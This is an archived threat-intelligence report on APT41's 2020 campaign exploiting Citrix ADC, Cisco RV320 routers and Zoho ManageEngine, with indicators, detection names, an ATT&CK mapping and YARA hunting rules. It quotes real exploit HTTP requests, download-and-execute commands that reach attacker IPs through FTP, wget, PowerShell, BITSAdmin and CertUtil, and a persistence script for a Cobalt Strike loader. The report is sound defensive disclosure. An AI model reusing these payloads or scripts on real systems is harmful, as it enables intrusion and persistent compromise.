{
	"id": "0841e372-7886-4596-951b-ed44cd071531",
	"created_at": "2026-04-06T00:15:11.909275Z",
	"updated_at": "2026-04-10T03:32:20.859208Z",
	"deleted_at": null,
	"sha1_hash": "39f4cb9983c03009b6c7199e164d992a0b1e0f1f",
	"title": "APT41 Initiates Intrusion Campaign Using Multiple Exploits",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 173624,
	"plain_text": "APT41 Initiates Intrusion Campaign Using Multiple Exploits\r\nBy Mandiant\r\nPublished: 2020-03-25 · Archived: 2026-04-05 17:28:50 UTC\r\nWritten by: Christopher Glyer, Dan Perez, Sarah Jones, Steve Miller\r\nBeginning this year, FireEye observed Chinese actor APT41 carry out one of the broadest campaigns by a Chinese\r\ncyber espionage actor we have observed in recent years. Between January 20 and March 11, FireEye observed\r\nAPT41 attempt to exploit vulnerabilities in Citrix NetScaler/ADC, Cisco routers, and Zoho ManageEngine\r\nDesktop Central at over 75 FireEye customers. Countries we’ve seen targeted include Australia, Canada,\r\nDenmark, Finland, France, India, Italy, Japan, Malaysia, Mexico, Philippines, Poland, Qatar, Saudi Arabia,\r\nSingapore, Sweden, Switzerland, UAE, UK and USA. The following industries were targeted: Banking/Finance,\r\nConstruction, Defense Industrial Base, Government, Healthcare, High Technology, Higher Education, Legal,\r\nManufacturing, Media, Non-profit, Oil \u0026 Gas, Petrochemical, Pharmaceutical, Real Estate, Telecommunications,\r\nTransportation, Travel, and Utility. It’s unclear if APT41 scanned the Internet and attempted exploitation en masse\r\nor selected a subset of specific organizations to target, but the victims appear to be more targeted in nature.\r\nExploitation of CVE-2019-19781 (Citrix Application Delivery Controller [ADC])\r\nStarting on January 20, 2020, APT41 used the IP address 66.42.98[.]220 to attempt exploits of Citrix Application\r\nDelivery Controller (ADC) and Citrix Gateway devices with CVE-2019-19781 (published December 17, 2019).\r\nFigure 1: Timeline of key events\r\nThe initial CVE-2019-19781 exploitation activity on January 20 and January 21, 2020, involved execution of the\r\ncommand ‘file /bin/pwd’, which may have achieved two objectives for APT41. First, it would confirm whether the\r\nsystem was vulnerable and the mitigation wasn’t applied. 
Second, it may return architecture-related information\r\nthat would be required knowledge for APT41 to successfully deploy a backdoor in a follow-up step.\r\nOne interesting thing to note is that all observed requests were only performed against Citrix devices, suggesting\r\nAPT41 was operating with an already-known list of identified devices accessible on the internet.\r\nhttps://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html\r\nPage 1 of 11\n\nPOST /vpns/portal/scripts/newbm.pl HTTP/1.1\r\nHost: [redacted]\r\nConnection: close\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.22.0\r\nNSC_NONCE: nsroot\r\nNSC_USER: ../../../netscaler/portal/templates/[redacted]\r\nContent-Length: 96\r\nurl=http://example.com\u0026title=[redacted]\u0026desc=[% template.new('BLOCK' = 'print `file /bin/pwd`') %]\r\nFigure 2: Example APT41 HTTP traffic exploiting CVE-2019-19781\r\nThere is a lull in APT41 activity between January 23 and February 1, which is likely related to the Chinese Lunar\r\nNew Year holidays which occurred between January 24 and January 30, 2020. This has been a common activity\r\npattern by Chinese APT groups in past years as well.\r\nStarting on February 1, 2020, APT41 moved to using CVE-2019-19781 exploit payloads that initiate a download\r\nvia the File Transfer Protocol (FTP). 
Specifically, APT41 executed the command ‘/usr/bin/ftp -o /tmp/bsd\r\nftp://test:[redacted]\\@66.42.98[.]220/bsd’, which connected to 66.42.98[.]220 over the FTP protocol, logged in to\r\nthe FTP server with a username of ‘test’ and a password that we have redacted, and then downloaded an unknown\r\npayload named ‘bsd’ (which was likely a backdoor).\r\nPOST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1\r\nAccept-Encoding: identity\r\nContent-Length: 147\r\nConnection: close\r\nNsc_User: ../../../netscaler/portal/templates/[redacted]\r\nUser-Agent: Python-urllib/2.7\r\nNsc_Nonce: nsroot\r\nHost: [redacted]\r\nContent-Type: application/x-www-form-urlencoded\r\nurl=http://example.com\u0026title=[redacted]\u0026desc=[% template.new('BLOCK' = 'print `/usr/bin/ftp -o /tmp/bsd ftp://te\r\nFigure 3: Example APT41 HTTP traffic exploiting CVE-2019-19781\r\nWe did not observe APT41 activity at FireEye customers between February 2 and February 19, 2020. China\r\ninitiated COVID-19 related quarantines in cities in Hubei province starting on January 23 and January 24, and\r\nrolled out quarantines to additional provinces starting between February 2 and February 10. While it is possible\r\nthat this reduction in activity might be related to the COVID-19 quarantine measures in China, APT41 may have\r\nremained active in other ways, which we were unable to observe with FireEye telemetry. We observed a\r\nsignificant uptick in CVE-2019-19781 exploitation on February 24 and February 25. 
The exploit behavior was\r\nalmost identical to the activity on February 1, where only the name of the payload ‘un’ changed.\r\nPOST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1\r\nAccept-Encoding: identity\r\nContent-Length: 145\r\nConnection: close\r\nNsc_User: ../../../netscaler/portal/templates/[redacted]\r\nUser-Agent: Python-urllib/2.7\r\nNsc_Nonce: nsroot\r\nHost: [redacted]\r\nContent-Type: application/x-www-form-urlencoded\r\nurl=http://example.com\u0026title= [redacted]\u0026desc=[% template.new('BLOCK' = 'print `/usr/bin/ftp -o /tmp/un ftp://te\r\nFigure 4: Example APT41 HTTP traffic exploiting CVE-2019-19781\r\nCitrix released a mitigation for CVE-2019-19781 on December 17, 2019, and as of January 24, 2020, released\r\npermanent fixes for all supported versions of Citrix ADC, Gateway, and SD-WAN WANOP.\r\nCisco Router Exploitation\r\nOn February 21, 2020, APT41 successfully exploited a Cisco RV320 router at a telecommunications organization\r\nand downloaded a 32-bit ELF binary payload compiled for a 64-bit MIPS processor named ‘fuc’ (MD5:\r\n155e98e5ca8d662fad7dc84187340cbc). It is unknown what specific exploit was used, but there is a Metasploit\r\nmodule that combines two CVEs (CVE-2019-1653 and CVE-2019-1652) to enable remote code execution on\r\nCisco RV320 and RV325 small business routers and uses wget to download the specified payload.\r\nGET /test/fuc HTTP/1.1\r\nHost: 66.42.98\\.220\r\nUser-Agent: Wget\r\nConnection: close\r\nFigure 5: Example HTTP request showing Cisco RV320 router downloading a payload via wget\r\n66.42.98[.]220 also hosted a file named http://66.42.98[.]220/test/1.txt. 
The content of 1.txt (MD5:\r\nc0c467c8e9b2046d7053642cc9bdd57d) is ‘cat /etc/flash/etc/nk_sysconfig’, which is the command one would\r\nexecute on a Cisco RV320 router to display the current configuration.\r\nCisco PSIRT confirmed that fixed software to address the noted vulnerabilities is available and asks customers to\r\nreview the following security advisories and take appropriate action:\r\nCisco Small Business RV320 and RV325 Routers Information Disclosure Vulnerability\r\nCisco Small Business RV320 and RV325 Routers Command Injection Vulnerability\r\nExploitation of CVE-2020-10189 (Zoho ManageEngine Zero-Day Vulnerability)\r\nOn March 5, 2020, researcher Steven Seeley published an advisory and released proof-of-concept code for a zero-day remote code execution vulnerability in Zoho ManageEngine Desktop Central versions prior to 10.0.474\r\n(CVE-2020-10189). Beginning on March 8, FireEye observed APT41 use 91.208.184[.]78 to attempt to exploit\r\nthe Zoho ManageEngine vulnerability at more than a dozen FireEye customers, which resulted in the compromise\r\nof at least five separate customers. FireEye observed two separate variations of how the payloads (install.bat and\r\nstoresyncsvc.dll) were deployed. 
In the first variation the CVE-2020-10189 exploit was used to directly upload\r\n“logger.zip”, a simple Java based program, which contained a set of commands to use PowerShell to download\r\nand execute install.bat and storesyncsvc.dll.\r\njava/lang/Runtime\r\ngetRuntime\r\n()Ljava/lang/Runtime;\r\nXcmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/t\r\nWindows\\Temp\\install.bat')\u0026powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.\r\nC:\\Windows\\Temp\\storesyncsvc.dll')\u0026C:\\Windows\\Temp\\install.bat\r\n'(Ljava/lang/String;)Ljava/lang/Process;\r\nStackMapTable\r\nysoserial/Pwner76328858520609\r\nLysoserial/Pwner76328858520609;\r\nFigure 6: Contents of logger.zip\r\nHere we see a toolmark from the tool ysoserial that was used to create the payload in the POC. The string\r\nPwner76328858520609 is unique to the POC payload, indicating that APT41 likely used the POC as source\r\nmaterial in their operation.\r\nIn the second variation, FireEye observed APT41 leverage the Microsoft BITSAdmin command-line tool to\r\ndownload install.bat (MD5: 7966c2c546b71e800397a67f942858d0) from known APT41 infrastructure\r\n66.42.98[.]220 on port 12345.\r\nParent Process: C:\\ManageEngine\\DesktopCentral_Server\\jre\\bin\\java.exe\r\nProcess Arguments: cmd /c bitsadmin /transfer bbbb http://66.42.98[.]220:12345/test/install.bat C:\\Users\\Public\\\r\nFigure 7: Example FireEye Endpoint Security event depicting successful CVE-2020-10189 exploitation\r\nIn both variations, the install.bat batch file was used to install persistence for a trial-version of Cobalt Strike\r\nBEACON loader named storesyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f).\r\n@echo off\r\nset \"WORK_DIR=C:\\Windows\\System32\"\r\nset \"DLL_NAME=storesyncsvc.dll\"\r\nset \"SERVICE_NAME=StorSyncSvc\"\r\nset \"DISPLAY_NAME=Storage Sync Service\"\r\nset \"DESCRIPTION=The Storage Sync Service is the top-level 
resource for File Sync. It creates sync relationships\r\nsc stop %SERVICE_NAME%\r\nsc delete %SERVICE_NAME%\r\nmkdir %WORK_DIR%\r\ncopy \"%~dp0%DLL_NAME%\" \"%WORK_DIR%\" /Y\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\" /v \"%SERVICE_NAME%\" /t REG_MULTI_SZ /d \"%SER\r\nsc create \"%SERVICE_NAME%\" binPath= \"%SystemRoot%\\system32\\svchost.exe -k %SERVICE_NAME%\" type= share start= aut\r\nSC failure \"%SERVICE_NAME%\" reset= 86400 actions= restart/60000/restart/60000/restart/60000\r\nsc description \"%SERVICE_NAME%\" \"%DESCRIPTION%\"\r\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\%SERVICE_NAME%\\Parameters\" /f\r\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\%SERVICE_NAME%\\Parameters\" /v \"ServiceDll\" /t REG_EXPAND_SZ /d \"\r\nnet start \"%SERVICE_NAME%\"\r\nFigure 8: Contents of install.bat\r\nStoresyncsvc.dll was a Cobalt Strike BEACON implant (trial-version) which connected to exchange.dumb1[.]com\r\n(with a DNS resolution of 74.82.201[.]8) using a jquery malleable command and control (C2) profile.\r\nGET /jquery-3.3.1.min.js HTTP/1.1\r\nHost: cdn.bootcss.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nReferer: http://cdn.bootcss.com/\r\nAccept-Encoding: gzip, deflate\r\nCookie: __cfduid=CdkIb8kXFOR_9Mn48DQwhIEuIEgn2VGDa_XZK_xAN47OjPNRMpJawYvnAhPJYM\r\nDA8y_rXEJQGZ6Xlkp_wCoqnImD-bj4DqdTNbj87Rl1kIvZbefE3nmNunlyMJZTrDZfu4EV6oxB8yKMJfLXydC5YF9OeZwqBSs3Tun12BVFWLI\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nFigure 9: Example APT41 Cobalt Strike BEACON jquery malleable C2 profile HTTP request\r\nWithin a few hours of initial exploitation, APT41 used the storesyncsvc.dll BEACON backdoor to download a\r\nsecondary backdoor with a different C2 address that 
uses Microsoft CertUtil, a common TTP that we’ve observed\r\nAPT41 use in past intrusions, which they then used to download 2.exe (MD5:\r\n3e856162c36b532925c8226b4ed3481c). The file 2.exe was a VMProtected Meterpreter downloader used to\r\ndownload Cobalt Strike BEACON shellcode. The usage of VMProtected binaries is another very common TTP\r\nthat we’ve observed this group leverage in multiple intrusions in order to delay analysis of other tools in their\r\ntoolkit.\r\nGET /2.exe HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\nPragma: no-cache\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.3\r\nHost: 91.208.184[.]78\r\nFigure 10: Example HTTP request downloading ‘2.exe’ VMProtected Meterpreter downloader via CertUtil\r\ncertutil -urlcache -split -f http://91.208.184[.]78/2.exe\r\nFigure 11: Example CertUtil command to download ‘2.exe’ VMProtected Meterpreter downloader\r\nThe Meterpreter downloader ‘TzGG’ was configured to communicate with 91.208.184[.]78 over port 443 to\r\ndownload the shellcode (MD5: 659bd19b562059f3f0cc978e15624fd9) for Cobalt Strike BEACON (trial-version).\r\nGET /TzGG HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)\r\nHost: 91.208.184[.]78:443\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nFigure 12: Example HTTP request downloading ‘TzGG’ shellcode for Cobalt Strike BEACON\r\nThe downloaded BEACON shellcode connected to the same C2 server: 91.208.184[.]78. 
We believe this is an\r\nexample of the actor attempting to diversify post-exploitation access to the compromised systems.\r\nManageEngine released a short term mitigation for CVE-2020-10189 on January 20, 2020, and subsequently\r\nreleased an update on March 7, 2020, with a long term fix.\r\nOutlook\r\nThis activity is one of the most widespread campaigns we have seen from China-nexus espionage actors in recent\r\nyears. While APT41 has previously conducted activity with an extensive initial entry such as the trojanizing of\r\nNetSarang software, this scanning and exploitation has focused on a subset of our customers, and seems to reveal\r\na high operational tempo and wide collection requirements for APT41.\r\nIt is notable that we have only seen these exploitation attempts leverage publicly available malware such as Cobalt\r\nStrike and Meterpreter. While these backdoors are full featured, in previous incidents APT41 has waited to deploy\r\nmore advanced malware until they have fully understood where they were and carried out some initial\r\nreconnaissance. In 2020, APT41 continues to be one of the most prolific threats that FireEye currently tracks. This\r\nnew activity from this group shows how resourceful and how quickly they can leverage newly disclosed\r\nvulnerabilities to their advantage.\r\nPreviously, FireEye Mandiant Managed Defense identified APT41 successfully leverage CVE-2019-3396\r\n(Atlassian Confluence) against a U.S. based university. 
While APT41 is a unique state-sponsored Chinese threat\r\ngroup that conducts espionage, the actor also conducts financially motivated activity for personal gain.\r\nIndicators\r\nType Indicator(s)\r\nCVE-2019-19781 Exploitation (Citrix Application Delivery Control)\r\n66.42.98[.]220\r\nCVE-2019-19781 exploitation attempts with a payload of ‘file /bin/pwd’\r\nCVE-2019-19781 exploitation attempts with a payload of ‘/usr/bin/ftp -o\r\n/tmp/un ftp://test:[redacted]\\@66.42.98[.]220/bsd’\r\nCVE-2019-19781 exploitation attempts with a payload of ‘/usr/bin/ftp -o\r\n/tmp/un ftp://test:[redacted]\\@66.42.98[.]220/un’\r\n/tmp/bsd\r\n/tmp/un\r\nCisco Router Exploitation\r\n66.42.98\\.220\r\n‘1.txt’ (MD5: c0c467c8e9b2046d7053642cc9bdd57d)\r\n‘fuc’ (MD5: 155e98e5ca8d662fad7dc84187340cbc)\r\nCVE-2020-10189 (Zoho ManageEngine Desktop Central)\r\n66.42.98[.]220\r\n91.208.184[.]78\r\n74.82.201[.]8\r\nexchange.dumb1[.]com\r\ninstall.bat (MD5: 7966c2c546b71e800397a67f942858d0)\r\nstoresyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f)\r\nC:\\Windows\\Temp\\storesyncsvc.dll\r\nC:\\Windows\\Temp\\install.bat\r\n2.exe (MD5: 3e856162c36b532925c8226b4ed3481c)\r\nC:\\Users\\[redacted]\\install.bat\r\nTzGG (MD5: 659bd19b562059f3f0cc978e15624fd9)\r\nC:\\ManageEngine\\DesktopCentral_Server\\jre\\bin\\java.exe spawning\r\ncmd.exe and/or bitsadmin.exe\r\nCertutil.exe downloading 2.exe and/or payloads from 91.208.184[.]78\r\nPowerShell downloading files with Net.WebClient\r\nDetecting the Techniques\r\nFireEye detects this activity across our platforms. 
This table contains several specific detection names from a\r\nlarger list of detections that were available prior to this activity occurring.\r\nPlatform Signature Name\r\nEndpoint Security\r\nBITSADMIN.EXE MULTISTAGE DOWNLOADER (METHODOLOGY)\r\nCERTUTIL.EXE DOWNLOADER A (UTILITY)\r\nGeneric.mg.5909983db4d9023e\r\nGeneric.mg.3e856162c36b5329\r\nPOWERSHELL DOWNLOADER (METHODOLOGY)\r\nSUSPICIOUS BITSADMIN USAGE B (METHODOLOGY)\r\nSAMWELL (BACKDOOR)\r\nSUSPICIOUS CODE EXECUTION FROM ZOHO MANAGE ENGINE (EXPLOIT)\r\nNetwork Security\r\nBackdoor.Meterpreter\r\nDTI.Callback\r\nExploit.CitrixNetScaler\r\nTrojan.METASTAGE\r\nExploit.ZohoManageEngine.CVE-2020-10198.Pwner\r\nExploit.ZohoManageEngine.CVE-2020-10198.mdmLogUploader\r\nHelix\r\nCITRIX ADC [Suspicious Commands]\r\nEXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Attempt]\r\nEXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Success]\r\nEXPLOIT - CITRIX ADC [CVE-2019-19781 Payload Access]\r\nEXPLOIT - CITRIX ADC [CVE-2019-19781 Scanning]\r\nMALWARE METHODOLOGY [Certutil User-Agent]\r\nWINDOWS METHODOLOGY [BITSadmin Transfer]\r\nWINDOWS METHODOLOGY [Certutil Downloader]\r\nMITRE ATT\u0026CK Technique Mapping\r\nATT\u0026CK Techniques\r\nInitial Access External Remote Services (T1133), Exploit Public-Facing Application (T1190)\r\nExecution PowerShell (T1086), Scripting (T1064)\r\nPersistence New Service (T1050)\r\nPrivilege Escalation Exploitation for Privilege Escalation (T1068)\r\nDefense Evasion BITS Jobs (T1197), Process Injection (T1055)\r\nCommand And Control Remote File Copy (T1105), Commonly Used Port (T1436), Uncommonly Used Port\r\n(T1065), Custom Command and Control Protocol (T1094), Data Encoding (T1132),\r\nStandard Application Layer Protocol (T1071)\r\nAppendix A: Discovery Rules\r\nThe following Yara rules serve as examples of discovery rules for APT41 
actor TTPs, turning the adversary\r\nmethods or tradecraft into new haystacks for purposes of detection or hunting. For all tradecraft-based discovery\r\nrules, we recommend deliberate testing and tuning prior to implementation in any production system. Some of\r\nthese rules are tailored to build concise haystacks that are easy to review for high-fidelity detections. Some of\r\nthese rules are broad in aperture and build larger haystacks for further automation or processing in threat hunting\r\nsystems.\r\nimport \"pe\"\r\nrule ExportEngine_APT41_Loader_String\r\n{\r\n meta:\r\n author = \"@stvemillertime\"\r\n description = \"This looks for a common APT41 Export DLL name in BEACON shellcode loaders,\r\n strings:\r\n $pcre = /loader_[\\x00-\\x7F]{1,}\\x00/\r\n condition:\r\n uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset\r\n}\r\nrule ExportEngine_ShortName\r\n{\r\n meta:\r\n author = \"@stvemillertime\"\r\n description = \"This looks for Win PEs where Export DLL name is a single character\"\r\n strings:\r\n $pcre = /[A-Za-z0-9]{1}\\.(dll|exe|dat|bin|sys)/\r\n condition:\r\n uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_t\r\n}\r\nrule ExportEngine_xArch\r\n{\r\n meta:\r\n author = \"@stvemillertime\"\r\n description = \"This looks for Win PEs where Export DLL name is a something like x32.dat\"\r\n strings:\r\n $pcre = /[\\x00-\\x7F]{1,}x(32|64|86)\\.dat\\x00/\r\n condition:\r\n uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.\r\n}\r\nrule RareEquities_LibTomCrypt\r\n{\r\n meta:\r\n author = \"@stvemillertime\"\r\n description = \"This looks for executables with strings from LibTomCrypt as seen by some APT41-esque acto\r\n strings:\r\n $a1 = \"LibTomMath\"\r\n condition:\r\n 
uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $a1\r\n}\r\nrule RareEquities_KCP\r\n{\r\n meta:\r\n author = \"@stvemillertime\"\r\n description = \"This is a wide catchall rule looking for executables with equities for a transport librar\r\n strings:\r\n $a01 = \"[RO] %ld bytes\"\r\n $a02 = \"recv sn=%lu\"\r\n $a03 = \"[RI] %d bytes\"\r\n $a04 = \"input ack: sn=%lu rtt=%ld rto=%ld\"\r\n $a05 = \"input psh: sn=%lu ts=%lu\"\r\n $a06 = \"input probe\"\r\n $a07 = \"input wins: %lu\"\r\n $a08 = \"rcv_nxt=%lu\\\\n\"\r\n $a09 = \"snd(buf=%d, queue=%d)\\\\n\"\r\n $a10 = \"rcv(buf=%d, queue=%d)\\\\n\"\r\n $a11 = \"rcvbuf\"\r\n condition:\r\n (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize \u003c 5MB and 3 of ($a*)\r\n}\r\nrule ConventionEngine_Term_Users\r\n{\r\n meta:\r\n author = \"@stvemillertime\"\r\n description = \"Searching for PE files with PDB path keywords, terms or anomalies.\"\r\n sample_md5 = \"09e4e6fa85b802c46bc121fcaecc5666\"\r\n ref_blog = \"https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-d\r\n strings:\r\n $pcre = /RSDS[\\x00-\\xFF]{20}[a-zA-Z]:\\\\[\\x00-\\xFF]{0,200}Users[\\x00-\\xFF]{0,200}\\.pdb\\x0\r\n condition:\r\n (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre\r\n}\r\nrule ConventionEngine_Term_Desktop\r\n{\r\n meta:\r\n author = \"@stvemillertime\"\r\n description = \"Searching for PE files with PDB path keywords, terms or anomalies.\"\r\n sample_md5 = \"71cdba3859ca8bd03c1e996a790c04f9\"\r\n ref_blog = \"https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-d\r\n strings:\r\n $pcre = /RSDS[\\x00-\\xFF]{20}[a-zA-Z]:\\\\[\\x00-\\xFF]{0,200}Desktop[\\x00-\\xFF]{0,200}\\.pdb\\\r\n condition:\r\n (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre\r\n}\r\nrule 
ConventionEngine_Anomaly_MultiPDB_Double\r\n{\r\n meta:\r\n author = \"@stvemillertime\"\r\n description = \"Searching for PE files with PDB path keywords, terms or anomalies.\"\r\n sample_md5 = \"013f3bde3f1022b6cf3f2e541d19353c\"\r\n ref_blog = \"https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-d\r\n strings:\r\n $pcre = /RSDS[\\x00-\\xFF]{20}[a-zA-Z]:\\\\[\\x00-\\xFF]{0,200}\\.pdb\\x00/\r\n condition:\r\n (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and #pcre == 2\r\n}\r\nSource: https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html"
	],
	"report_names": [
		"apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html"
	],
	"threat_actors": [
		{
			"id": "4d5f939b-aea9-4a0e-8bff-003079a261ea",
			"created_at": "2023-01-06T13:46:39.04841Z",
			"updated_at": "2026-04-10T02:00:03.196806Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"WICKED PANDA",
				"BRONZE EXPORT",
				"Brass Typhoon",
				"TG-2633",
				"Leopard Typhoon",
				"G0096",
				"Grayfly",
				"BARIUM",
				"BRONZE ATLAS",
				"Red Kelpie",
				"G0044",
				"Earth Baku",
				"TA415",
				"WICKED SPIDER",
				"HOODOO",
				"Winnti",
				"Double Dragon"
			],
			"source_name": "MISPGALAXY:APT41",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e698860d-57e8-4780-b7c3-41e5a8314ec0",
			"created_at": "2022-10-25T15:50:23.287929Z",
			"updated_at": "2026-04-10T02:00:05.329769Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"APT41",
				"Wicked Panda",
				"Brass Typhoon",
				"BARIUM"
			],
			"source_name": "MITRE:APT41",
			"tools": [
				"ASPXSpy",
				"BITSAdmin",
				"PlugX",
				"Impacket",
				"gh0st RAT",
				"netstat",
				"PowerSploit",
				"ZxShell",
				"KEYPLUG",
				"LightSpy",
				"ipconfig",
				"sqlmap",
				"China Chopper",
				"ShadowPad",
				"MESSAGETAP",
				"Mimikatz",
				"certutil",
				"njRAT",
				"Cobalt Strike",
				"pwdump",
				"BLACKCOFFEE",
				"MOPSLED",
				"ROCKBOOT",
				"dsquery",
				"Winnti for Linux",
				"DUSTTRAP",
				"Derusbi",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2a24d664-6a72-4b4c-9f54-1553b64c453c",
			"created_at": "2025-08-07T02:03:24.553048Z",
			"updated_at": "2026-04-10T02:00:03.787296Z",
			"deleted_at": null,
			"main_name": "BRONZE ATLAS",
			"aliases": [
				"APT41 ",
				"BARIUM ",
				"Blackfly ",
				"Brass Typhoon",
				"CTG-2633",
				"Earth Baku ",
				"GREF",
				"Group 72 ",
				"Red Kelpie ",
				"TA415 ",
				"TG-2633 ",
				"Wicked Panda ",
				"Winnti"
			],
			"source_name": "Secureworks:BRONZE ATLAS",
			"tools": [
				"Acehash",
				"CCleaner v5.33 backdoor",
				"ChinaChopper",
				"Cobalt Strike",
				"DUSTPAN",
				"Dicey MSDN",
				"Dodgebox",
				"ForkPlayground",
				"HUC Proxy Malware (Htran)"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434511,
	"ts_updated_at": 1775791940,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/39f4cb9983c03009b6c7199e164d992a0b1e0f1f.pdf",
		"text": "https://archive.orkl.eu/39f4cb9983c03009b6c7199e164d992a0b1e0f1f.txt",
		"img": "https://archive.orkl.eu/39f4cb9983c03009b6c7199e164d992a0b1e0f1f.jpg"
	}
}